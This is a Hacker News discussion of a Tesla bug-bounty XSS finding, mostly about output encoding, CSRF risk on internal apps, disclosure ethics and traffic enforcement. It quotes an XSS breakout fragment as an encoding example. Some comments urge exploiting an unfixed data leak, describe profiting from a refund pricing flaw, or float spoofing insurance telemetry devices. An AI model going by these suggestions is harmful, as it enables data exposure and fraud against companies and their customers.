Cracking My Windshield and Earning $10k on the Tesla Bug Bounty Program (samcurry.net)
574 points by EdOverflow on July 16, 2019 | 182 comments



This bug probably existed because some developer thought "this is an internal application, I don't need to apply the same rigorous input/(edit: and output, as replies point out) sanitization as I do with normal sites, because it's only accessible by VPN."

As a consultant who gets to see a lot of "internal only" applications, this is one of the misconceptions that my coworkers and I try to fight against. XSS is effective even if the attacker doesn't have access to the internal application, because it's not the attacker's computer making the requests.


Output sanitization is what you want to bet on. Only your website / app knows where a piece of data will be displayed, so that is when you should apply appropriate encoding of the output stream.


Yup. React has this by default for everything you render. You have to opt out with “dangerouslySetInnerHTML” if you don’t want it.



As have done other frameworks for quite some time, btw.


As other frameworks have done for quite some time* :)


As done framework time some other.


Actually, input might be the better option as one rarely needs to accept HTML or such special characters.

It's also more common to display or use data than to store it, so you have fewer places where you can fail if you just convert the input before storing it.

It's nice to be able to trust all data coming from the server.


Trust but verify. The only correct option is to do both.


Can you (or another commenter) give an illustration of this sort of output sanitization?


The term you probably want to look for in your web framework is "encoding".

I don't like "sanitization" personally, because it sounds like you're removing "bad stuff", but in general, "bad stuff" is not identifiable or removable because "bad stuff" is highly context-dependent, plus a lot of times the "bad stuff" is perfectly legitimate [1]. Apostrophes are "bad stuff", because they can break out of SQL queries and HTML tags, but they are also parts of people's names. Double-quotes are "bad things", but they are legitimately part of all sorts of real data. Any "sanitize(string)" function is by definition wrong because it has no place for a context to go, and it will do bad things to your data.
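To make that concrete, here's a minimal sketch in Python (the helper name `naive_sanitize` is made up for illustration): a context-free "sanitize" function corrupts legitimate data, while HTML encoding preserves it.

```python
import html

def naive_sanitize(s):
    # A context-free "sanitize" has to guess what "bad stuff" means,
    # so it ends up deleting legitimate characters from real data.
    for ch in ("'", '"', "<", ">"):
        s = s.replace(ch, "")
    return s

name = "Conan O'Brien"
print(naive_sanitize(name))           # Conan OBrien -- the apostrophe is gone
print(html.escape(name, quote=True))  # Conan O&#x27;Brien -- safe in HTML, data intact
```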

One of my items on my short checklist for examining an HTML templating language is "does the simplest possible way to dump out a string to the user at least do HTML encoding on the value"? That is,

    x = "<>"
    template = compileTemplate("{x}")
    template.Dump({x: x})
for whatever the simplest output of a value is, should output "&lt;&gt;"; if it outputs "<>", you've got a templating language that you ARE going to write XSS attacks in, no matter how careful you are. The time you want to dump out non-encoded text is the exception, not the rule.

Bonus points for being even more aware of the context and correctly encoding things in Javascript context vs. HTML context, etc. This isn't a magic wand that fixes everything, but in general, if it does default to a blind HTML-encode it at least means that instead of a security failure if you screw up the encoding, you'll get the user seeing some ugly stuff on their screen like &lt; instead.

[1]: Although, technically, I think it's acceptable for an HTML encoding function to just eliminate the ASCII control characters other than newline, carriage return, and tab, rather than encode them. Those are just asking for trouble, even if you encode them. Especially NUL. Even in 2019, best to keep NULs out of places they don't belong.
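The checklist test above can be sketched as follows; this is not any real templating library, just a toy class showing the encode-by-default behavior being described.

```python
import html

class SafeTemplate:
    """Toy template: substituted values are HTML-encoded by default."""
    def __init__(self, source):
        self.source = source

    def render(self, **values):
        out = self.source
        for key, val in values.items():
            # The simplest possible substitution path applies HTML encoding;
            # raw output would require a separate, explicit opt-out.
            out = out.replace("{" + key + "}", html.escape(str(val), quote=True))
        return out

print(SafeTemplate("{x}").render(x="<>"))  # &lt;&gt;
```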


Exactly, sanitization is a misnomer. If you are concatenating plain text together with HTML then you have an app which is functionally broken when someone with an apostrophe in their name tries to use it -- it's not just a matter of security. The strings must be the same format (i.e. both valid HTML fragments) before you concatenate them, or the result will be unparsable garbage.

And the idea of "sanitization at input" is especially ridiculous: how can you know what you will be concatenating that input with until you actually do it? I.e. is it being inserted into some HTML? Is it going in an attribute value or a text node? What about outputting JSON?
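A small Python sketch of why the context matters: the same string is harmless in an HTML text node but breaks out of an attribute, and JSON needs a different encoding altogether.

```python
import html
import json

value = '" onmouseover="alert(1)'

# In a text node, quotes are legal; only <, > and & need encoding here.
print(html.escape(value, quote=False))  # unchanged: no <, > or & present
# In an attribute value, quotes must be encoded or the string breaks out.
print(html.escape(value, quote=True))   # &quot; onmouseover=&quot;alert(1)
# In JSON output, the rules are different again.
print(json.dumps(value))
```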


Right.

This is why we typically speak about defense in depth. Input sanitization works best when applied to known, expected inputs, like a phone number or date of birth.

Output encoding is the real solution: we know where we intend any data to end up (that is, how it's displayed), so we can ensure that it's in the correct format and that the format's parser won't interpret it as code instead of data. I.e. HTML attribute, HTML, JSON, JavaScript, etc.


If a user has a bracket character in any field, it's OK to allow it, as long as you don't render it directly in any HTML. You have to make sure that when you render it, you render it as `&lt;` or `&gt;`, which get displayed as `<` or `>` but aren't interpreted as HTML.


Correct. And one reason to properly format for output, rather than sanitise input, is that you do not know how the string might be used. You can sanitise for HTML output, but that won't cover shell command output (i.e. when you pass the string as a parameter to a tool via --vehicle-name=). Thus input is to be stored as-is, and NEVER trusted, even if some input sources "sanitise" it.


This mistake is what causes the incredibly common HTML entities in plain-text emails, as well as in RSS article titles.


Output formatting, example: "><script src="// becomes &quot;&gt;&lt;script src=&quot;// for the web. For other types of applications, where any of these characters have special meaning and might be interpreted, these might be formatted differently for output.


Hell even in my past career supporting hardware network products a lot of companies had / have management ports that are vulnerable to all sorts of stuff. The industry standard response from engineers was "well that should be behind a firewall".

It's time we stop pretending the big bad internet is just "out there" just because it should be, it is everywhere.


Normally, it would not be the input to be sanitised, but rather the output properly formatted. It's easier to make sure that ANY type of input is shown properly, as opposed to eliminating SOME of the known issues.


Note that even if it's only accessible by VPN, attackers can still make HTTP requests to it because when an employee connected to the VPN visits attacker.com , attacker.com can make XHR calls to internalsite.com . The attacker can't read the response (unless there are other vulnerabilities), but if you don't have CSRF protection, the attacker can perform actions on the internal site.
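A minimal sketch of the CSRF protection being described, using Python's stdlib (the session dict and function names are made up for illustration): the internal site embeds a per-session token in its forms, and attacker.com can't read it, so forged cross-site requests fail the check.

```python
import hmac
import secrets

def issue_csrf_token(session):
    # Generate an unguessable token once per session; the server embeds
    # it in every form it serves over the VPN.
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token

def verify_csrf_token(session, submitted):
    # Constant-time comparison; a cross-site request forged from
    # attacker.com cannot include the correct token.
    expected = session.get("csrf_token", "")
    return bool(expected) and hmac.compare_digest(expected, submitted or "")

session = {}
token = issue_csrf_token(session)
print(verify_csrf_token(session, token))     # True  -- legitimate form post
print(verify_csrf_token(session, "forged"))  # False -- CSRF attempt rejected
```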


Could just be because the application was written by a less experienced programmer, or even outsourced?


It could be, or it could even be that whatever process that brings code from development to production is less stringent on internal applications. Maybe people don't review the code as closely (or at all!), maybe they have fewer tests for internal code. "Internal only" applications almost universally have less scrutiny applied to them in my experience.


I've seen very experienced developers make mistakes with input/output sanitization.


I work as a contractor for a bank, and while investigating a small security issue reported by a third-party audit firm, we discovered that the clever, bytecode-weaving, auto-generated declarative security had been overridden by someone who added his own, equally fancy security module directly in a parent project.

I cannot describe the shock when I realized what information an attacker could have gained during the six-month window the bug was active.

All of this code was written by experienced programmers, it's just that nobody ever wrote any tests to ensure the fancy security code was still in place.


Tesla and SpaceX are both pretty maniacal about not outsourcing programming, to my knowledge.


Interesting. Obviously they view it as a core competency. This would seem like a non-obvious and unnecessary expense to many, but (on the Tesla side) differentiates them from other automakers. Whether that results in a barrier to competition... we'll see.


Although if you believe these anecdotes from a supposed ex-employee then competency is not the word to use:

https://twitter.com/atomicthumbs/status/1032939617404645376


I only know of low-level tools being open sourced like service meshes, RPC clients, event busses, and metric servers. I’ve never seen internal applications open sourced. Do you have an example?


OP said out sourced, not open sourced


This stuff should be taken care of by your web framework wherever possible.


> On a final note, Tesla’s bug bounty program is fantastic. They provide a safe haven for researchers who are in good-faith trying to hack their cars. If you accidentally brick one, they’ll even offer support in attempting to fix it.

This is an amazingly open and refreshing policy!


* Subject to Tesla's definition of "good faith".

Another hacker who discovered references to the Model 3 in his car before its announcement:

* had his vehicle firmware downgraded to a version that contained no such references

* had his vehicle blocked from receiving further firmware updates

* had his vehicle's Ethernet port disabled

* [deleted] caught some commentary from Musk about how his hacking behavior put himself and other drivers at risk.[/deleted]


Source? The closest thing I can find is this, which matches some details of your description but conflicts with others: https://twitter.com/elonmusk/status/706185709481119745


Interesting, I hadn't seen that reply. I edited my previous comment.


So Tesla can send a custom update that breaks the specific car that you bought?


They would call it "protecting their IP", rather than "breaking", but yes.

Though I suppose it's not technically "breaking" but downgrading.


You are entitled to the software provided with the vehicle at time of purchase, no more.

Tesla software is Tesla IP. Would you dump your company's GitHub repos to customers? If not, why would Tesla wanting to tightly control their firmware and its contents be different? I have yet to run across a license agreement, where code is provided to a customer, that allows reverse engineering or disassembly.

I do disagree with the decision to disable ethernet ports on an owner's product.


> You are entitled to the software provided with the vehicle at time of purchase, no more.

And is the company entitled to reach into your device and remove the software provided and substitute it with an older version?


If the statement above is correct then they can substitute any newer version of the software with the one that was installed when you bought it.

One could argue that because Tesla advertises heavily with OTA upgrades, the upgrades are included in the purchase price and therefore should not be able to be unilaterally pulled.


Many software updates are effectively product recalls, even if we don't call them that. Replacing the most recent software with a recalled version could be a safety concern, depending on what bugs exist in the old software.

I don't know exactly what obligations automakers have with respect to recalls, but I would expect that it's something more than just "we aren't allowed to make the car any more broken than it was the day you bought it".


>You are entitled to the software provided with the vehicle at time of purchase, no more.

Is this actually true? I'm entitled to a working product, so if a future update fixes bugs, am I not entitled to it?

Also, specifically in Tesla's case, they advertise that their cars are "capable of providing Autopilot features today, and full self-driving capabilities in the future through software updates". If that does happen, am I not entitled to that update considering I bought a Tesla with that in mind?


As I have to say far too often to people:

"What does your contract [or in this case, purchase agreement] say?" If it is silent on the subject of updates, how would a court interpret the argument that you are entitled to free software updates? For how long?

The battery and powertrain warranty is specific. The remaining component warranty is specific. The amount of time you receive premium data for is specific. There is no language to my knowledge (I would have to pull the purchase agreement for my Model S out) that speaks to a purchaser's entitlement to software updates when purchasing any model of Tesla.


The lack of specific language in the contract means that it is open to interpretation. And the most reasonable interpretation is that you are entitled to all updates because that is what is in their marketing.


Agree to disagree that is a reasonable interpretation.


Then you'd have a case for deceptive marketing, perhaps, if the advertising says "full self driving will be available with this hardware, subject to regulation" but the literal interpretation of the caveat is "but not to you, ever".


Whether their marketing language is included in the actual contract is irrelevant. If sales people and Tesla sell cars based on the idea that a Tesla is better because you get software updates and added functionality down the road (which they do), courts would most definitely side with the consumer.

Not to mention the fact that courts also tend to side with consumers when it comes to "implied contracts". If every car sold has and still does get updates on a regular basis, Tesla can't just not give the same to some customers.

Now, there may well be a provision in the contract stating they have a right to deny updates if you try to reverse engineer things, but otherwise they would need to go through the courts to go after someone for breach of contract. You don't get to take the law into your own hands when you suspect someone of wronging you.


I love that we're living in a world where you can accidentally brick your car. The future, man, the future.


As an owner of a 1974 Mini Clubman, I can assure you that the ability to "brick" your car by tampering with it is not a new concept...


I don't. Especially if it can be bricked through the internet in the middle of driving at high speed.


Does this mean you can legally mod your car under the guise of hacking it?


It's not illegal to have an N2O (nitrous oxide) factory in your garage; it's illegal to drive the car on the roads. Good-faith emissions-control hacking would probably not involve long-distance highway driving or racing.


I was thinking you wouldn't have to tell Tesla this, but it's a good point because the car is connected so they would know if you were driving it or not.


Modding cars is already legal.


I mean, you need to expand this statement, because with just those five words it's blatantly untrue. There's a whole load of mods allowed by my insurance, and I'm sure you'd consider most of them "modding" - the law also has no opinion on most of them unless they start changing the emissions of the car (in which case that's still not the end of the world; you can get the car re-certified for the new emissions figure).

Edit: ignore me, I apparently cannot read


You're being pedantic. Saying "modding cars is legal" doesn't mean it's unrestricted.

Since when do insurance companies approve car mods? And what does that have to do with something being legal?

The only federal legal restrictions are on emissions equipment and safety equipment like seat belts and airbags. Some states have additional laws like tint limits and exhaust sound limits.


Wait, I either misread his comment, or it was changed after I replied - I was replying with the assumption that he said "modding is already illegal".

And any mods have to be reported to your insurer in the UK, even if it's just changing rims or putting on non-standard size tyres - failing to do so might get your claim denied if you ever file one.


Also, at least in the US, there is little chance an insurance company could deny a claim based on a mod (reported or not) as long as said mod could not reasonably be construed to be the cause of the claim.

Not that they wouldn't try.

Same as the whole "warranty void if seal is broken" nonsense.


I misread it exactly the same as you and had to go back.

I think since the default is for something to be "legal" until it is made "illegal" it makes the phrase "already legal" an uncommon one.


Maybe if you only drive on private property and not public roads. Probably like aftermarket modifications currently.


This topic made me think of a funny old video of a farmer who put a turbo on his tractor.

Probably illegal to drive this on any public road, however on his own property/private roads he is having a blast.

https://www.youtube.com/watch?v=IZZpAO0jP7E


What is with this latent assumption in this thread that DIY activity is a priori illegal? Of course it's legal to mod your car under the guise of hacking. Just like it's legal to mod your car under the guise of throwing a birthday party. The "guise" is irrelevant!

There's obviously legal nuance involving speed, safety, etc. But propagating a cultural assumption of "doing something weird must be illegal" is frightening.


It comes down to DRM and BS in the software industry. Anything with a EULA usually disallows you from doing anything "unauthorized" with it, and Teslas have a lot of software and a lot of EULA.


I will agree that software authoritarianism is a big source of ambiguous fear being pushed onto other endeavors, but a contractual dispute is a far cry from "illegal". And yes the broken-ass DMCA can lift some of that into the realm of illegal, but even that is practically unenforceable beyond a mere chilling effect on publishing.


>but even that is practically unenforceable beyond a mere chilling effect on publishing

Not with Tesla recording remotely what "owners" do with their cars.


Also some gearing changes most likely.

I'd want a lot more roll cage than he has on there.


What a great response and turnaround. Bug fixed within 24 hours and paid out within a month.

I wouldn't expect any other car manufacturer to respond ever, most don't even own their software stack.


A lot of other vehicle manufacturers couldn't anyway; they don't build the infotainment systems in-house, they simply re-theme/re-badge units from companies like Panasonic, Pioneer, Fujitsu-Ten, etc.

So if they got a bug report it would have to travel through ten layers of indirection before an engineer got to read it (let alone understand/respond). Particularly when there might be two or three different written word languages used between consumer and engineer (e.g. English -> Japanese -> Mandarin (Taiwan)).

Tesla (and Ford previously) were actually oddballs in that they didn't use "off the shelf" infotainment units.


I've tried reporting a bug where, on a 2016 Mercedes GLA, if you're playing MP3s from a USB stick, the car will remember the track to play but nothing else about it, so after coming back the same track plays but with the wrong name, wrong album art, etc. It's literally impossible to report. The dealer said they have no way to do that except for just flashing my car with a newer firmware and hoping it fixes it (it didn't); messaging Mercedes UK yields no reply; posting on their official forums yields no reply. I just gave up after a while.


    Tesla (and Ford previously) were actually oddballs in that they didn't use "off the shelf" infotainment units.
Isn't being different great sometimes?


I had to rent a ton of cars over the past year before finally buying one, and always remarked on how shitty the infotainment systems were, and that the only one which didn't actively piss me off was Ford's. Now I know why!


We should always, always applaud and praise companies that are at least this serious about bounty programs.

Two years ago, although I wouldn't call myself the deepest technical person on the planet, I found a terrible bug that exposed 1.1M records for a Bay Area startup. (edit: the bug was really easy to find; it was a form of URL injection. I couldn't even believe that bug was there in the first place.)

I reached out to them multiple times, only to realize they were going to ignore me in perpetuity. I didn't even want money, I would have been happy just to see the bug fixed. (I never helped fix a bug that another company had). Nada.

A less scrupulous person would have sold that information and exposed data for 1.1M people.

I am not naming the company here, even though they would totally deserve it.


I once reverse engineered a Gmail worm found in the wild. The underlying exploit ended up being a security scan bypass in Google docs. I spent a lot of time submitting a bounty report, but I made one fatal mistake: I used URL redirection in the PoC. It was automatically rejected even though that was an example of content that the scan normally detects, not the actual vulnerability. It was closed as not eligible, then silently fixed a week later.

Edit: I checked the emails to refresh my memory. A human acknowledged that it was a flaw in the security scanner and forwarded it to the drive team, then a bot (AFAICT) determined that it was not eligible based on metadata in the report.

Edit 2: I did get one thing out of it. They sent me an invitation to a Bounty Craft event in Las Vegas during Def Con, which I was attending that year (likely the actions of another bot scraping the email list). I got there early and accidentally sat down in the Microsoft Security Response team's couch area while they were all up getting food. They were nice people. They realized I never picked up swag on the way in and someone took me back to the door to get it. Apparently, since I was with one of the event organizers who said "you forgot to give him a t-shirt", they assumed I was staff and gave me a staff t-shirt. The event was 100% about how the sponsor companies were investing in automated fuzzing technologies and basically didn't need bug bounty hunters anymore. Slap in the face.


Apparently Google wants you to sell it to the highest bidder next time.


I understand the point you're making about incentives, but the phrasing is poor. The reason people shouldn't sell exploits to the highest bidder isn't because the vulnerable software author refuses to pay a bounty.

People shouldn't sell exploits because it's a crime that hurts people.


In the movie Independence Day, the aliens' computer systems were hacked with a few hours' worth of work. Why were they hacked and destroyed? Because nobody reported and worked on security incidents, of course. Why would anyone need to in a militaristic society?

My story is silly, of course, but the point is real. If you don't attack and then fix systems, a lot of people will get hurt.


That's better phrased, indeed. The problem with your earlier statement is that the incentives are not for the people you are talking about.

You don't offer rewards to prevent criminals from selling exploits. Criminals are going to sell exploits anyway. Bug bounties have nothing to do with criminal behavior.

Bounties are there to incentivize the honest people to do security work. And the response of an honest person being denied a bounty IS ABSOLUTELY NOT to turn around and sell it.


I know you meant Proof of Concept, but it took a couple of readings to realize you weren't saying "Person of Color".


The context in no way lends itself to that, though. Unless people often have URL redirects?


>I am not naming the company here, even though they would totally deserve it.

I do wonder to what extent the culture itself of how we approach bugs is designed to benefit companies over consumers. That we avoid naming and shaming due to a chilling effect of blow back, that we have disclosure windows, that the legal framework for reporting bugs is so flaky, that we are all accustomed to bad security practices and getting our data hacked, it all feels like it is architected to benefit companies who rarely suffer from hacks (sometimes there is a significant cost, but that rarely outweighs the profits).

It reminds me of identity theft. The entire concept that you lost money because your identity was stolen from you, and that the bank (or other company) that fell for the fake identity isn't even a party to the actual crime, pushes the costs onto consumers. Instead of seeing the banks as the victims, and thus responsible for bearing the costs that aren't recoverable from the criminals, it is their customers who are. This reduces the cost to the bank of poor identity management. An entire culture that offloads the costs of the bank's penny-pinching onto consumers.

Another such example is when the early automotive industry pushed for people to view jaywalking as the crime, shifting blame onto pedestrians for being in the way of cars.


Another aspect of this is the taboo of discussing salaries / compensation with your peers and coworkers. Sure, it might be a bit "low class" to be concerned with money like that, but you know what? We're all mostly working class, and it's in our interest to discuss wages.


It's in your interest to discuss wages if you're paid median or below wages. Wait till you're paid many multiples of your coworkers and then see how you feel about it. The taboo does nothing for most workers, but does protect people who are highly compensated.


In effect, protecting those who are at the top and need the protection the least.


Please become less scrupulous! If that bug isn't fixed, that's just another in a long line of disposable bay area startups run by rich, careless people—certainly none of whom lurk on HN—who treat sensitive customer information like used tissue. I'm sure there's a way to do it where you don't expose the data, but I'd think of it as a favour to a million people.


I also found a terrible bug recently, that could cost this company millions of dollars.

Basically, the company has physical stores and also sells stuff online. Stuff bought online can be returned in store. However, if you bought an item online which was on sale, you could return in store for the full amount. I returned a laptop which I bought online for $999 and received $1399 back.

I think it was due to the fact that the store runs on iSeries/AS400 and the website is in .Net. I happen to work with both, and I can imagine that there is a lot of pain to make the systems work together.


Quite a lot of companies are vulnerable to forms of this, but will notice if you try to exploit it for "millions of dollars". It normally doesn't have much to do with what technologies they use internally.


I think most times I've returned anything, I've had to show the original receipt, so it'd be pretty obvious to them if I bought the item at a discounted price.

If they didn't bother to look at the receipt for your laptop... well, that seems like negligence on the part of the staff handling the return.


This is a membership store, they do NOT require a receipt. They look up your info, find the item and process the return.


I'm wondering what the right approach is in such a situation. If they don't fix the leak, do you keep quiet or go public? Going public puts them under much more pressure to fix their shit; otoh, bad actors have probably more than enough time to scrape the data. But the other scenario bears the risk of some other bad actor also having discovered it and silently abusing the data. If the leak goes unfixed and the company grows, someone might some day be able to scrape data on ten times as many people.

So would you rather actively help leaking 1m records to public or potentially have someone else getting 10m a year later, but not having anything to do with it directly?

Thinking about it you might try and contact a bigger tech news site to get the companies attention.


Rule of thumb is to notify them and share your intent of public disclosure within a certain time frame. Typically 90 days.

That's exactly what happened with Zoom. They half ass fixed it, then it went public and it was fixed in one day.


Please name them.

> they would totally deserve it.

They do. It is important to warn their customers about their practices. They had their chance and proved they're absolutely incompetent and shouldn't have anyone's data.


But I wonder: what if a developer purposely plants a bug and then asks a friend to report it and split the bounty? It seems it would be easy to take advantage of such programs internally.


It's a little less malicious than backdooring it, which has a pretty strong precedent already. Also, code review "should" catch it.


The repository would show who wrote the bug in the first place, and it would have to pass code review. One would have to wait for the developer to leave the company before activating this scenario.


Developers write bugs all the time; it's hard to know if someone purposely wrote one or it just slipped in due to a tight schedule.


Right now I know of 5-10 serious bugs (exposing data on 100 million plus users in total) in multiple startups in India. I have reported them and haven't heard back. The problem is especially severe in India.


If I was their user, I'd want to know if they were so carelessly exposing my data.


If you have been able to access that data, chances are someone else has too. And the data might as well be considered as having leaked already. I wonder if the right course of action would be to send it to haveibeenpwned.


I assume this company has customers in the EU. If the bug still exists today, try dropping a GDPR complaint to one of the European data regulators. Though they have limited resources, they have started taking these things pretty seriously [1] and will look _very_ unkindly on a failure to report the breach or address it.

[1] https://ico.org.uk/about-the-ico/news-and-events/news-and-bl...


All the comments on here seem to be praising Tesla for paying a bug bounty, but I'm just sitting here horrified at how much information a phone support person is able to view remotely about owners' cars, not to mention the ability to send OTA updates.

No way am I buying a connected car.


I think you might be out of options soon, if you want a new car that is. A while longer for used cars obviously.

Once all new cars are connected, the DuckDuckGo of cars will launch soon thereafter with the promise of a privacy centric connected car :)


The real thing you realize here is that Tesla is a software company (and it will eat the world). Getting a hotfix out that fast is the proof in the pudding.


Interestingly, the car returned the (current?) speed:

Speed: 81 mph

I wonder if that, coupled with the GPS info (which wasn't included in the data returned, but I assume the car knows it) would be sufficient to issue a speeding ticket if the government had access to the data?


I know in some jurisdictions at least you also need to identify the driver, because the ticket needs to be made out to whoever was speeding, which may or may not be the owner of the vehicle.


And some countries include a separate offence of "failing to identify the driver", with penalties usually more severe than the driving offence.

A few British politicians have found this out the hard way.

https://en.wikipedia.org/wiki/Chris_Huhne

https://www.theguardian.com/uk-news/2019/jan/29/labour-mp-fi...


I think this [1] Wikipedia article better covers the situation with Huhne.

[1]: https://en.wikipedia.org/wiki/R_v_Huhne


A former Australian federal court judge went to jail for two years for lying about who was driving his car when it incurred a speeding fine worth $77

https://en.wikipedia.org/wiki/Marcus_Einfeld#Criminal_convic...


Unless I'm missing something, both of these cases (and the case of the Australian judge a sibling commenter pointed to) have nothing to do with "failing to identify the driver" and everything to do with straight-up lying to the courts, i.e. perjury. The fact that they were speeding seems incidental.


Don't worry, we'll have facial recognition for that soon enough.


When speed cameras came about jurisdictions that wanted to use them simply changed their law to say that a photo/radar reading of the car speeding by the camera was prima facie evidence that the owner was responsible for the infraction.

Luckily it isn't in Tesla's interest to just hand this info over to the government en masse.


There are indeed some aspects of Arizona I absolutely love. Unfortunately the D's and R's here seem to collude enough to slowly strip away a lot of the protections AZ law used to provide.


It REALLY depends on your government.

Michigan doesn't allow automated speed cameras that issue tickets, while New York does.

Going off how Michigan operates then no, the GPS info wouldn't be enough.

In another government such as China the answer is very likely "Yes".


Your cellphone already has all of this information too. Google Maps will tell me both my current speed and the road's speed limit while driving with navigation on.


But how would they know who to ticket? Just because your car is moving, doesn't mean you're the one driving it. If they cannot prove who was operating the vehicle at the time of infraction, they cannot issue a ticket.


In Alberta, the fine is for owning a speeding car, kind of like a parking ticket. The rationale is that you are responsible for who you lend the car to. It is a civil rather than criminal penalty, so no license points, but no getting out of it either. Rental car companies challenged it and lost (though you can be sure they will pass the cost on to you).


But the real rationale is: let’s blame someone that’s easy to blame instead of figuring out who’s actually responsible.

Germany has photo-radar, but can only issue a ticket to the driver.

Possibly that’s related to some of their history, I’m not sure.

Though they do issue voluntary “caution” money tickets to the owner at a discount to make it go away without identifying the driver.


I believe in the Netherlands they will send a ticket to the owner. The owner then has to pay the ticket or provide the info of the driver.


Same here in Australia.


That's not true, red light cameras have no problem issuing fines to the vehicle owner.


In many places red light cameras ticket the owner of the vehicle as a parking violation (presumably for having your car in the intersection when the light was red?), whereas typically the driver of the vehicle is ticketed by an officer for a moving violation like speeding or running a light. My memory on this is pretty old though; laws may have changed and it may be location dependent.


Which is why they're a terrible idea, usually implemented out of sheer greed for passive income with no actual police work.


Not to mention the increase in accidents; it would be ironic if there were a class action lawsuit holding ATS, Redflex and the other companies responsible.


Yes, but they take a picture of the car.

What if your car is being towed by a speeding truck (or on a trailer)?


Then you could dispute the ticket, and presumably the fact that it's being towed would be visible in the photo.


There is usually a picture of the car along with a time and date of the incident. You would simply appeal it and say that the car is clearly on a trailer and that the truck pulling the trailer is at fault.


Yes they do. In many jurisdictions, if you are willing to perjure yourself (or are innocent), you can sign an affidavit that you were not driving the vehicle. Then it is up to the authorities to press the case based on quality of the video evidence.

IMO it's a silly hack. The fine should go to the vehicle owner, who is responsible for pursuing recompense from the person they lent the car to (or filing a theft report, or whatever).


Yeah, in our city a few years ago, a lawsuit was brought that even with camera pictures/video, it can't be proven the vehicle owner was driving the car and so all the red light camera tickets in process were thrown out and the cameras were deactivated. So definitely depends on jurisdiction.


May I ask what city you live in?


The fine goes to the vehicle owner not the driver. This is why if you get fined by an automated speed camera or red light camera on a rental car, the rental company pay the fine and charge it back to you - with admin fees.

If it's a physical ticket on the car (parking, speeding, etc), you can pay it before the rental company ever hears of it and avoid those admin fees.


That doesn't seem to matter. In DC we have speed cameras everywhere and it doesn't matter whether your face is visible in a photo, the ticket will be issued to the plate and must be paid by the owner regardless of who was driving the car.


It's not a traffic offense, at least. While still annoying, I'll take that any day over the alternative. $70 civil penalty vs $150 fine + $70 court costs + increased insurance premiums.

As a side note, it does feel like my due process rights are being violated when I have to deal with this. You can't go in front of a judge, but rather can go argue the ticket in some local government office.


Some insurance companies are already doing this, I think: they attach a device to your car, and if you stay under the speed limit you get discounts on your payments.


MetroMile does this with an OBD-II device... their niche is insurance for low-mileage vehicles, and they track your mileage with a dongle device that must always be plugged in.

Seems like a huge information asymmetry, though. Anyone who's ever dealt with an insurance claim knows that they find any nitpick to get out of payments... having an insurance provider that can say "actually we don't owe you anything because according to our black box, you were 2 mph over the speed limit therefore you were negligent" seems like it defeats the purpose of having insurance.

I like the idea of more accurate pricing based on actual (low) usage, but I don't like that it gives them a disproportionately larger surface area for their lawyers to find technicalities that gets them out of paying claims. When the tollbooth transponders came out, they explicitly said "this will never be used to issue speeding tickets" even though all the data was there... I don't believe MetroMile makes any similar promise.


Anyone who's ever dealt with an insurance claim knows that they find any nitpick to get out of payments

"Everyone" says that, but I haven't found it to be true. Progressive fixed my car without any hassle (they paid nearly $5K to replace a door and fender and repaint the side of the car after someone tried to pry open the door). I also made a claim against Geico when a USPS truck hit me, again, trouble free, they paid the claim (minus my deductible) quickly and it took 18 months to get the USPS t

My sister lost her house to a fire and said that her insurance company (Allstate maybe) was super easy to deal with.


I wish I had your experiences in such clear-cut cases. I had to perform an independent investigation to get the insurance company to honor my side of the story in my last car claim, and relatives are dealing with a nightmare of a home insurance story that's looking like the insurance company is going drop them because of the complications involved.

In my experience, everyone is just trying to minimize their cash outflows. Incident claims are a zero-sum game, and if someone gets more or better information, that comes at the expense of someone else.


I wonder... could you spoof that device? It doesn't seem all too hard to - the OBD-II interface is pretty well documented.


Yeah, there's some reddit posts about doing it to the Progressive Snapshot device. But it being an insurer, you'd potentially be on the hook for insurance fraud, which doesn't carry a light penalty...


No need to worry about MetroMile, those dongles they distribute aren't reliable at all.

Source: Me, after paying hundreds of dollars because the "signal was lost" for over a month, billed at the daily max rate, while their emails about it went to spam.


Liability insurance exists to cover you even when you are liable.


There are also companies like The Flow that offer that data directly from mobile devices via an app.


In my country any device that would be giving fines has to be periodically checked every month by the authorities and made unmodifiable without oversight.


Probably not if there is a +/-10% margin of error.


If you are manufacturing a vehicle/speedometer in 2019 with a 10% margin of error, I'd argue that was "not fit for purpose".

I left Australia in 2006, but even before then, the government had altered the statutes on speeding from the old model - 10% margin of error, to a flat 3kph(2mph) due to "increased accuracy in manufacturing".


Speedometers measure speed by counting wheel rotations and multiplying them by the circumference. There's at least a few percent inherent error as circumference is going to vary with what tyre is fitted and how worn it is.

F1 cars, and I believe now high-end sports cars, use a different system that's basically how an optical mouse works: they image the road underneath the car and measure it moving past. This captures turning as well as speed. If you watch an F1 night race you can see a glow on the ground under the nose - that's the illuminator for the sensor.
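To put rough numbers on the wheel-rotation error (the tyre figures below are illustrative, not from any particular car):

```javascript
// Speedometers infer speed as wheel_rpm * circumference, so any error in
// the assumed circumference maps directly into a speed error.
function indicatedSpeed(trueSpeedKph, assumedCircM, actualCircM) {
  // The wheel turns at trueSpeed / actualCirc; the gauge multiplies
  // that rotation rate by the circumference it assumes.
  return trueSpeedKph * (assumedCircM / actualCircM);
}

// Example: assume a tyre that is ~1.98 m around when new; ~8 mm of tread
// wear shrinks the diameter by ~16 mm, shaving roughly 0.05 m off the
// circumference (pi * 0.016).
const newTyre = indicatedSpeed(100, 1.98, 1.98);  // 100.0 - calibrated
const wornTyre = indicatedSpeed(100, 1.98, 1.93); // ~102.6 - reads high
console.log(newTyre.toFixed(1), wornTyre.toFixed(1));
```

So a couple of percent of drift from tyre wear alone is plausible, before you even consider swapping to a different tyre size.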


There are also Ka-band Doppler radar systems used for sensing speed on the vehicle (exactly like how a radar gun works). You mount it on the vehicle to point to the ground at an angle and then connect it to a speedometer. Accuracy is usually within 1-3% up to 300mph.
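For reference, the relationship such a Doppler ground-speed sensor relies on can be sketched like this (the carrier frequency, mounting angle, and shift values below are made up for illustration):

```javascript
// A radar pointed at the ground at angle theta to the direction of travel
// sees a reflected frequency shifted by f_d = 2 * v * f * cos(theta) / c.
// Solving for v gives the ground speed.
const C = 299792458; // speed of light, m/s

function speedFromDoppler(shiftHz, carrierHz, beamAngleRad) {
  return (shiftHz * C) / (2 * carrierHz * Math.cos(beamAngleRad));
}

// Illustrative numbers: a 35 GHz Ka-band sensor angled 45 degrees to the
// road, observing a ~3.3 kHz shift, works out to roughly 20 m/s (~72 km/h).
const v = speedFromDoppler(3300, 35e9, Math.PI / 4);
console.log(v.toFixed(1)); // ~20.0
```

Unlike the wheel-rotation method, this doesn't care how worn the tyres are, which is where the 1-3% accuracy claim comes from.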


